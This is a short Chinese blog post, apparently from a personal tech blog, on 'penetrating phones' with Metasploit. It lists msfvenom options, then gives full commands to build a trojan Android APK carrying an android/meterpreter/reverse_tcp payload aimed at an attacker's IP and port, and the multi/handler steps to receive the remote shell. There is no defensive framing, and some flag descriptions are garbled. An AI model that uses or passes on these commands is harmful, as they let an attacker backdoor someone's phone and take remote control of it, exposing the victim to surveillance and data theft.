canvas#live2dcanvas { border: 0 !important; left: 0; }

渗透 手机

msfvenom基本参数

msfvenom -h

-p ->指定payload

-1 ->列出所有可用项

-f ->指定文件输出格式

-e ->指定编码格式

-a ->选择架构平台

-o ->选择文件输出路径,包含文件名

-s ->指定生成的payload最大大小

-b ->避免使用的字符

-I ->指定编码次数

-c ->添加自己的shellcode

-xxxx.exc -k ->捆绑文件到xxx.cxc

生成apk
android:

msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻 击机IP LPORT=攻击机端口 -f apk -o payload.apk

eg: msfvenom -p android/meterpreter/reverse_tcp LHOST=XXXXXX LPORT=4444 R>/root/apk.apk

metasploit:

use exploit/multi/handler 加载模块

set payload android/meterpreter/reverse_tcp 选择Payload

set LHOST10.1.1.169这里的地址设置成我

们刚配置木马的IP地址

set LPORT4545这里的端口设置成刚才我们

配置木马所监听的端口

exploit 侵入中

posted on   Pastの  阅读(329)  评论(0编辑  收藏  举报

编辑推荐:
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
阅读排行:
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· DeepSeek在M芯片Mac上本地化部署
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

导航

统计

  
点击右上角即可分享
微信分享提示